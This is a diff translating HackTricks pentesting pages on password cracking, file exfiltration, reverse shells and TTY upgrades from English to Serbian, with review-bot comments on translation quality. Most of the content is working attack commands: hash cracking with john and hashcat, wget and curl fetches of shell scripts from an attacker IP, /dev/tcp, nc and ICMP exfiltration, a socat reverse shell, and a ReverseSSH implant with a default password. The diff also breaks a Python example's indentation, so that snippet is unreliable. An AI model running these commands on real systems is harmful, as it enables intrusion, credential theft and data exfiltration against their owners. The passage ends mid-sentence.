@@ -635,13 +506,11 @@ pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt sudo apt-get install qpdf qpdf --password= --decrypt encrypted.pdf plaintext.pdf ``` - ### PDF Owner Password -To crack a PDF Owner password check this: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/) +Da biste probili PDF Owner lozinku, proverite ovo: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/) ### JWT - ```bash git clone https://github.com/Sjord/jwtcrack.git cd jwtcrack @@ -653,17 +522,13 @@ python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5h python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john john jwt.john #It does not work with Kali-John ``` - ### NTLM cracking - ```bash Format:USUARIO:ID:HASH_LM:HASH_NT::: john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot ``` - ### Keepass - ```bash sudo apt-get install -y kpcli #Install keepass tools like keepass2john keepass2john file.kdbx > hash #The keepass is only using password 
@@ -671,30 +536,24 @@ keepass2john -k file.kdbx > hash # The keepass is also using a f #The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` - ### Keberoasting - ```bash john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ``` +### Luks slika -### Lucks image - -#### Method 1 - -Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks) +#### Metoda 1 +Instalirajte: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks) ```bash bruteforce-luks -f ./list.txt ./backup.img cryptsetup luksOpen backup.img mylucksopen ls /dev/mapper/ #You should find here the image mylucksopen mount /dev/mapper/mylucksopen /mnt ``` - -#### Method 2 - +#### Metod 2 ```bash cryptsetup luksDump backup.img #Check that the payload offset is set to 4096 dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1 
@@ -703,39 +562,33 @@ cryptsetup luksOpen backup.img mylucksopen ls /dev/mapper/ #You should find here the image mylucksopen mount /dev/mapper/mylucksopen /mnt ``` - -Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1) +Još jedan Luks BF tutorijal: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1) ### Mysql - ```bash #John hash format :$mysqlna$* dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d ``` - -### PGP/GPG Private key - +### PGP/GPG Privatni ključ ```bash gpg2john private_pgp.key #This will generate the hash and save it in a file john --wordlist=/usr/share/wordlists/rockyou.txt ./hash ``` - ### Cisco
### DPAPI Master Key -Use [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) and then john +Koristite [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) i zatim john ### Open Office Pwd Protected Column -If you have an xlsx file with a column protected by a password you can unprotect it: - -- **Upload it to google drive** and the password will be automatically removed -- To **remove** it **manually**: +Ako imate xlsx datoteku sa kolonom zaštićenom lozinkom, možete je otključati: +- **Otpremite je na google drive** i lozinka će biti automatski uklonjena +- Da **uklonite** to **ručno**: ```bash unzip file.xlsx grep -R "sheetProtection" ./* @@ -744,35 +597,22 @@ hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UV # Remove that line and rezip the file zip -r file.xls . ``` - -### PFX Certificates - +### PFX Sertifikati ```bash # From https://github.com/Ridter/p12tool ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt # From https://github.com/crackpkcs12/crackpkcs12 crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx ``` +## Alati -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} - -## Tools - -**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) +**Primeri hešova:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) ### Hash-identifier - ```bash hash-identifier > ``` - ### Wordlists - **Rockyou** 
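Review bot: hunk `@@ -744,35 +597,22 @@` removes the Trickest sponsor block (the `Use [**Trickest**](https://trickest.com/...)` paragraph, its `Get Access Today:` line and the `{% embed url="https://trickest.com/..." %}` line) in addition to translating the headings around it; a commit whose subject is `Translated [...]` should not silently drop content, so either restore and translate the block or state the removal in the commit message.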
@@ -780,40 +620,33 @@ hash-identifier - [**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists) - [**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords) -### **Wordlist Generation Tools** - -- [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Advanced keyboard-walk generator with configurable base chars, keymap and routes. +### **Alati za generisanje rečnika** +- [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Napredni generator za šetnju tastaturom sa konfigurisanim osnovnim karakterima, rasporedom tastera i rutama. ```bash kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt ``` +### John mutacija -### John mutation - -Read _**/etc/john/john.conf**_ and configure it - +Pročitajte _**/etc/john/john.conf**_ i konfigurišite ga ```bash john --wordlist=words.txt --rules --stdout > w_mutated.txt john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules ``` - ### Hashcat -#### Hashcat attacks +#### Hashcat napadi -- **Wordlist attack** (`-a 0`) with rules - -**Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules). +- **Napad rečnika** (`-a 0`) sa pravilima +**Hashcat** već dolazi sa **folderom koji sadrži pravila** ali možete pronaći [**druga zanimljiva pravila ovde**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules). ``` hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule ``` +- **Wordlist combinator** napad -- **Wordlist combinator** attack - -It's possible to **combine 2 wordlists into 1** with hashcat.\ -If list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated. 
- +Moguće je **kombinovati 2 rečnika u 1** sa hashcat-om.\ +Ako je lista 1 sadržala reč **"hello"** a druga je sadržala 2 reda sa rečima **"world"** i **"earth"**. Reči `helloworld` i `helloearth` će biti generisane. ```bash # This will combine 2 wordlists hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt @@ -824,9 +657,7 @@ hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt ## hello-earth! hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $! ``` - - **Mask attack** (`-a 3`) - ```bash # Mask attack with simple mask hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d @@ -858,9 +689,7 @@ hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1 ## Use it to crack the password hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask ``` - -- Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack - +- Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) napad ```bash # Mask numbers will be appended to each word in the wordlist hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d 
@@ -868,47 +697,30 @@ hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d # Mask numbers will be prepended to each word in the wordlist hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt ``` - -#### Hashcat modes - +#### Hashcat modusi ```bash hashcat --example-hashes | grep -B1 -A2 "NTLM" ``` - -Cracking Linux Hashes - /etc/shadow file - +Kršenje Linux hešova - /etc/shadow datoteka ``` - 500 | md5crypt $1$, MD5(Unix) | Operating-Systems +500 | md5crypt $1$, MD5(Unix) | Operating-Systems 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems ``` - -Cracking Windows Hashes - +Razbijanje Windows hešova ``` 3000 | LM | Operating-Systems 1000 | NTLM | Operating-Systems ``` - -Cracking Common Application Hashes - +Razbijanje uobičajenih hešova aplikacija ``` - 900 | MD4 | Raw Hash - 0 | MD5 | Raw Hash - 5100 | Half MD5 | Raw Hash - 100 | SHA1 | Raw Hash +900 | MD4 | Raw Hash +0 | MD5 | Raw Hash +5100 | Half MD5 | Raw Hash +100 | SHA1 | Raw Hash 10800 | SHA-384 | Raw Hash - 1400 | SHA-256 | Raw Hash - 1700 | SHA-512 | Raw Hash +1400 | SHA-256 | Raw Hash +1700 | SHA-512 | Raw Hash ``` - {{#include ../banners/hacktricks-training.md}} - -
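Review bot: in hunk `@@ -868,47 +697,30 @@` the leading spaces inside the hashcat mode listings are stripped (`- 500 | md5crypt $1$, MD5(Unix)` becomes `+500 | md5crypt $1$, MD5(Unix)`, `- 0 | MD5 | Raw Hash` becomes `+0 | MD5 | Raw Hash`), so the mode numbers no longer line up with `10800 | SHA-384` and `3200 | bcrypt`; whitespace inside a fenced block is content and the translation pass must not touch it. The same hunk also renders "Cracking" two different ways (`Kršenje Linux hešova` versus `Razbijanje Windows hešova` and `Razbijanje uobičajenih hešova aplikacija`); pick one term and use it for all three captions.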
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %} diff --git a/src/generic-hacking/exfiltration.md b/src/generic-hacking/exfiltration.md index 2e5c0c1dd..2c9ebd60d 100644 --- a/src/generic-hacking/exfiltration.md +++ b/src/generic-hacking/exfiltration.md @@ -1,40 +1,33 @@ -# Exfiltration +# Ekstrakcija {{#include ../banners/hacktricks-training.md}} -## Commonly whitelisted domains to exfiltrate information +## Uobičajeni dozvoljeni domeni za ekstrakciju informacija -Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused +Proverite [https://lots-project.com/](https://lots-project.com/) da biste pronašli uobičajene dozvoljene domeine koji se mogu zloupotrebiti -## Copy\&Paste Base64 +## Kopiraj\&Zalepi Base64 **Linux** - ```bash base64 -w0 #Encode file base64 -d file #Decode file ``` - **Windows** - ``` certutil -encode payload.dll payload.b64 certutil -decode payload.b64 payload.dll ``` - ## HTTP **Linux** - ```bash wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py fetch 10.10.14.14:8000/shell.py #FreeBSD ``` - **Windows** - ```bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf 
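Review bot: in the first hunk of `src/generic-hacking/exfiltration.md` (`@@ -1,40 +1,33 @@`) the title `# Exfiltration` becomes `# Ekstrakcija`, which means "extraction" and loses the security-specific sense of the English term; the loanword "eksfiltracija" keeps that meaning and should be used here and in `## Uobičajeni dozvoljeni domeni za ekstrakciju informacija`. The hunk also deletes the closing Trickest block of `brute-force.md` (`{% embed url="https://trickest.com/..." %}`), the same content removal flagged for the earlier hunk of that file.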
@@ -49,13 +42,11 @@ Start-BitsTransfer -Source $url -Destination $output #OR Start-BitsTransfer -Source $url -Destination $output -Asynchronous ``` - -### Upload files +### Upload fajlova - [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170) -- [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) -- Python module [uploadserver](https://pypi.org/project/uploadserver/): - +- [**SimpleHttpServer štampanje GET i POST (takođe zaglavlja)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149) +- Python modul [uploadserver](https://pypi.org/project/uploadserver/): ```bash # Listen to files python3 -m pip install --user uploadserver @@ -68,9 +59,7 @@ curl -X POST http://HOST/upload -H -F 'files=@file.txt' # With basic auth: # curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world ``` - ### **HTTPS Server** - ```python # from https://gist.github.com/dergachev/7028596 # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ @@ -105,31 +94,25 @@ from urllib.parse import quote app = Flask(__name__) @app.route('/') def root(): - print(request.get_json()) - return "OK" +print(request.get_json()) +return "OK" if __name__ == "__main__": - app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) +app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) ### ``` - ## FTP -### FTP server (python) - +### FTP сервер (python) ```bash pip3 install pyftpdlib python3 -m pyftpdlib -p 21 ``` - -### FTP server (NodeJS) - +### FTP сервер (NodeJS) ``` sudo npm install -g ftp-srv --save ftp-srv ftp://0.0.0.0:9876 --root /tmp ``` - -### FTP server (pure-ftp) - +### FTP сервер (pure-ftp) ```bash apt-get update && apt-get install pure-ftp ``` 
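Review bot: hunk `@@ -105,31 +94,25 @@` breaks the Flask HTTPS example: `print(request.get_json())` and `return "OK"` are dedented to column 0 directly under `def root():`, and `app.run(ssl_context='adhoc', ...)` is dedented under `if __name__ == "__main__":`, which Python rejects with an IndentationError; restore the four-space indentation shown on the `-` lines. The same hunk introduces Cyrillic in `### FTP сервер (python)`, `### FTP сервер (NodeJS)` and `### FTP сервер (pure-ftp)` while the rest of the file is Latin-script Serbian (`Upload fajlova`, `Python modul`); use the Latin `server` consistently.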
@@ -147,9 +130,7 @@ mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart ``` - -### **Windows** client - +### **Windows** клијент ```bash #Work well with python. With pure-ftp use fusr:ftp echo open 10.11.0.41 21 > ftp.txt @@ -160,37 +141,31 @@ echo GET mimikatz.exe >> ftp.txt echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` - ## SMB -Kali as server - +Kali kao server ```bash kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory kali_op2> smbserver.py -smb2support name /path/folder # Share a folder #For new Win10 versions impacket-smbserver -smb2support -user test -password test test `pwd` ``` - -Or create a smb share **using samba**: - +Ili kreirajte smb deljenje **koristeći sambu**: ```bash apt-get install samba mkdir /tmp/smb chmod 777 /tmp/smb #Add to the end of /etc/samba/smb.conf this: [public] - comment = Samba on Ubuntu - path = /tmp/smb - read only = no - browsable = yes - guest ok = Yes +comment = Samba on Ubuntu +path = /tmp/smb +read only = no +browsable = yes +guest ok = Yes #Start samba service smbd restart ``` - Windows - ```bash CMD-Wind> \\10.10.14.14\path\to\exe CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials 
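Review bot: `### **Windows** клијент` in hunk `@@ -147,9 +130,7 @@` is Cyrillic while every other translated heading in this file is Latin script (`Kali kao server`, `Ili kreirajte smb deljenje`); write it as `klijent` so the file uses one script throughout.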
@@ -198,54 +173,42 @@ CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentia WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali" WindPS-2> cd new_disk: ``` - ## SCP -The attacker has to have SSHd running. - +Napadač mora imati pokrenut SSHd. ```bash scp @:/ ``` - ## SSHFS -If the victim has SSH, the attacker can mount a directory from the victim to the attacker. - +Ako žrtva ima SSH, napadač može montirati direktorijum sa žrtve na napadača. ```bash sudo apt-get install sshfs sudo mkdir /mnt/sshfs sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/ ``` - ## NC - ```bash nc -lvnp 4444 > new_file nc -vn 4444 < exfil_file ``` - ## /dev/tcp -### Download file from victim - +### Preuzmi datoteku sa žrtve ```bash nc -lvnp 80 > file #Inside attacker cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim ``` - -### Upload file to victim - +### Učitajte datoteku na žrtvu ```bash nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker # Inside victim exec 6< /dev/tcp/10.10.10.10/4444 cat <&6 > file.txt ``` - -thanks to **@BinaryShadow\_** +hvala **@BinaryShadow\_** ## **ICMP** - ```bash # To exfiltrate the content of a file via pings you can do: xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done @@ -256,64 +219,50 @@ xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ``` - -In **victim**, connect to the Kali server: - +U **žrtvi**, povežite se na Kali server: ```bash tftp -i get nc.exe ``` - ## PHP -Download a file with a PHP oneliner: - +Preuzmite datoteku sa PHP oneliner-om: ```bash echo "" > down2.php ``` - ## VBScript - ```bash Attacker> python -m SimpleHTTPServer 80 ``` - -**Victim** - +**Žrtva** ```bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
@@ -345,23 +294,16 @@ echo ts.Close >> wget.vbs ```bash cscript wget.vbs http://10.11.0.5/evil.exe evil.exe ``` - ## Debug.exe -The `debug.exe` program not only allows inspection of binaries but also has the **capability to rebuild them from hex**. This means that by providing an hex of a binary, `debug.exe` can generate the binary file. However, it's important to note that debug.exe has a **limitation of assembling files up to 64 kb in size**. - +Program `debug.exe` ne samo da omogućava inspekciju binarnih datoteka, već takođe ima **sposobnost da ih rekonstruiše iz heksadecimalnog formata**. To znači da pružanjem heksa binarne datoteke, `debug.exe` može generisati binarnu datoteku. Međutim, važno je napomenuti da `debug.exe` ima **ograničenje u sastavljanju datoteka do 64 kb veličine**. ```bash # Reduce the size upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt ``` - -Then copy-paste the text into the windows-shell and a file called nc.exe will be created. - -- [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html) +Zatim kopirajte i nalepite tekst u windows-shell i biće kreiran fajl pod nazivom nc.exe. ## DNS -- [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) - {{#include ../banners/hacktricks-training.md}} diff --git a/src/generic-hacking/reverse-shells/README.md b/src/generic-hacking/reverse-shells/README.md index 9f8253367..9c5d45504 100644 --- a/src/generic-hacking/reverse-shells/README.md +++ b/src/generic-hacking/reverse-shells/README.md @@ -8,7 +8,7 @@ # [**Full TTYs**](full-ttys.md) -# **Auto-generated shells** +# **Automatski generisane ljuske** - [**https://reverse-shell.sh/**](https://reverse-shell.sh/) - [**https://www.revshells.com/**](https://www.revshells.com/) 
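Review bot: hunk `@@ -345,23 +294,16 @@` removes the two reference links that carry the actual content of these sections, `https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html` under Debug.exe and `https://github.com/62726164/dns-exfil` under DNS, leaving `## DNS` as an empty heading followed only by the banner include; URLs are not translatable text and must be kept as-is.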
diff --git a/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md b/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md index b52276fda..1afa1af2e 100644 --- a/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md +++ b/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md @@ -1,13 +1,12 @@ -# Expose local to the internet +# Izložite lokalno internetu {{#include ../../banners/hacktricks-training.md}} -**The goal of this page is to propose alternatives that allow AT LEAST to expose local raw TCP ports and local webs (HTTP) to the internet WITHOUT needing to install anything in the other server (only in local if needed).** +**Cilj ove stranice je da predloži alternative koje omogućavaju DA BAR izlože lokalne sirove TCP portove i lokalne web stranice (HTTP) internetu BEZ potrebe za instalacijom bilo čega na drugom serveru (samo lokalno ako je potrebno).** ## **Serveo** -From [https://serveo.net/](https://serveo.net/), it allows several http and port forwarding features **for free**. - +Sa [https://serveo.net/](https://serveo.net/), omogućava nekoliko http i port forwarding funkcija **besplatno**. ```bash # Get a random port from serveo.net to expose local port 4444 ssh -R 0:localhost:4444 serveo.net @@ -15,11 +14,9 @@ ssh -R 0:localhost:4444 serveo.net # Expose a web listening in localhost:300 in a random https URL ssh -R 80:localhost:3000 serveo.net ``` - ## SocketXP -From [https://www.socketxp.com/download](https://www.socketxp.com/download), it allows to expose tcp and http: - +Sa [https://www.socketxp.com/download](https://www.socketxp.com/download), omogućava izlaganje tcp i http: ```bash # Expose tcp port 22 socketxp connect tcp://localhost:22 
@@ -27,11 +24,9 @@ socketxp connect tcp://localhost:22 # Expose http port 8080 socketxp connect http://localhost:8080 ``` - ## Ngrok -From [https://ngrok.com/](https://ngrok.com/), it allows to expose http and tcp ports: - +Sa [https://ngrok.com/](https://ngrok.com/), omogućava izlaganje http i tcp portova: ```bash # Expose web in 3000 ngrok http 8000 @@ -39,11 +34,9 @@ ngrok http 8000 # Expose port in 9000 (it requires a credit card, but you won't be charged) ngrok tcp 9000 ``` - ## Telebit -From [https://telebit.cloud/](https://telebit.cloud/) it allows to expose http and tcp ports: - +Sa [https://telebit.cloud/](https://telebit.cloud/) omogućava izlaganje http i tcp portova: ```bash # Expose web in 3000 /Users/username/Applications/telebit/bin/telebit http 3000 @@ -51,11 +44,9 @@ From [https://telebit.cloud/](https://telebit.cloud/) it allows to expose http a # Expose port in 9000 /Users/username/Applications/telebit/bin/telebit tcp 9000 ``` - ## LocalXpose -From [https://localxpose.io/](https://localxpose.io/), it allows several http and port forwarding features **for free**. - +Sa [https://localxpose.io/](https://localxpose.io/), omogućava nekoliko http i port forwarding funkcija **besplatno**. ```bash # Expose web in port 8989 loclx tunnel http -t 8989 @@ -63,11 +54,9 @@ loclx tunnel http -t 8989 # Expose tcp port in 4545 (requires pro) loclx tunnel tcp --port 4545 ``` - ## Expose -From [https://expose.dev/](https://expose.dev/) it allows to expose http and tcp ports: - +Sa [https://expose.dev/](https://expose.dev/) omogućava izlaganje http i tcp portova: ```bash # Expose web in 3000 ./expose share http://localhost:3000 
@@ -75,14 +64,11 @@ From [https://expose.dev/](https://expose.dev/) it allows to expose http and tcp # Expose tcp port in port 4444 (REQUIRES PREMIUM) ./expose share-port 4444 ``` - ## Localtunnel -From [https://github.com/localtunnel/localtunnel](https://github.com/localtunnel/localtunnel) it allows to expose http for free: - +Sa [https://github.com/localtunnel/localtunnel](https://github.com/localtunnel/localtunnel) omogućava izlaganje http-a besplatno: ```bash # Expose web in port 8000 npx localtunnel --port 8000 ``` - {{#include ../../banners/hacktricks-training.md}} diff --git a/src/generic-hacking/reverse-shells/full-ttys.md b/src/generic-hacking/reverse-shells/full-ttys.md index 32d0eb1d5..865a9332e 100644 --- a/src/generic-hacking/reverse-shells/full-ttys.md +++ b/src/generic-hacking/reverse-shells/full-ttys.md @@ -2,36 +2,25 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} - ## Full TTY -Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`. +Napomena: ljuska koju postavite u `SHELL` varijabli **mora** biti **navedena unutar** _**/etc/shells**_ ili `Vrednost za SHELL varijablu nije pronađena u /etc/shells datoteci Ovaj incident je prijavljen`. Takođe, imajte na umu da sledeći snippeti rade samo u bash-u. Ako ste u zsh, pređite na bash pre nego što dobijete ljusku pokretanjem `bash`. #### Python - ```bash python3 -c 'import pty; pty.spawn("/bin/bash")' (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; ``` - > [!NOTE] -> You can get the **number** of **rows** and **columns** executing **`stty -a`** +> Možete dobiti **broj** **redova** i **kolona** izvršavanjem **`stty -a`** #### script - ```bash script /dev/null -qc /bin/bash #/dev/null is to not store anything (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset; ``` - #### socat - ```bash #Listener: socat file:`tty`,raw,echo=0 tcp-listen:4444 @@ -39,8 +28,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444 #Victim: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ``` - -### **Spawn shells** +### **Pokretanje ljuski** - `python -c 'import pty; pty.spawn("/bin/sh")'` - `echo os.system('/bin/bash')` 
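Review bot: hunk `@@ -2,36 +2,25 @@` in `full-ttys.md` translates the literal error message inside the backticks (`The value for the SHELL variable was not found in the /etc/shells file This incident has been reported` becomes `Vrednost za SHELL varijablu nije pronađena u /etc/shells datoteci Ovaj incident je prijavljen`); that string is program output the reader needs to recognise verbatim on their terminal, so keep it in English and translate only the surrounding sentence. The same hunk also drops the 8kSec Academy block (`Deepen your expertise in **Mobile Security** ...` and `{% embed url="https://academy.8ksec.io/" %}`), which is a content change, not a translation.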
@@ -57,39 +45,32 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ## ReverseSSH -A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target. +Pogodan način za **interaktivni pristup ljusci**, kao i **prenos fajlova** i **prosleđivanje portova**, je postavljanje statički povezanog ssh servera [ReverseSSH](https://github.com/Fahrj/reverse-ssh) na cilj. -Below is an example for `x86` with upx-compressed binaries. For other binaries, check [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/). - -1. Prepare locally to catch the ssh port forwarding request: +Ispod je primer za `x86` sa upx-kompresovanim binarnim datotekama. Za druge binarne datoteke, proverite [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/). +1. Pripremite lokalno da uhvatite zahtev za prosleđivanje ssh porta: ```bash # Drop it via your preferred way, e.g. wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh /dev/shm/reverse-ssh -v -l -p 4444 ``` - -- (2a) Linux target: - +- (2a) Linux cilj: ```bash # Drop it via your preferred way, e.g. wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh /dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 ``` - -- (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)): - +- (2b) Windows 10 cilj (za ranije verzije, proverite [project readme](https://github.com/Fahrj/reverse-ssh#features)): ```bash # Drop it via your preferred way, e.g. 
certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe reverse-ssh.exe -p 4444 kali@10.0.0.2 ``` - -- If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`: - +- Ako je zahtev za preusmeravanje porta ReverseSSH bio uspešan, sada biste trebali moći da se prijavite sa podrazumevanom lozinkom `letmeinbrudipls` u kontekstu korisnika koji pokreće `reverse-ssh(.exe)`: ```bash # Interactive shell access ssh -p 8888 127.0.0.1 @@ -97,25 +78,16 @@ ssh -p 8888 127.0.0.1 # Bidirectional file transfer sftp -P 8888 127.0.0.1 ``` - ## Penelope -[Penelope](https://github.com/brightio/penelope) automatically upgrades Linux reverse shells to TTY, handles the terminal size, logs everything and much more. Also it provides readline support for Windows shells. +[Penelope](https://github.com/brightio/penelope) automatski unapređuje Linux reverse shells u TTY, upravlja veličinom terminala, beleži sve i još mnogo toga. Takođe pruža readline podršku za Windows shells. ![penelope](https://github.com/user-attachments/assets/27ab4b3a-780c-4c07-a855-fd80a194c01e) ## No TTY -If for some reason you cannot obtain a full TTY you **still can interact with programs** that expect user input. In the following example, the password is passed to `sudo` to read a file: - +Ako 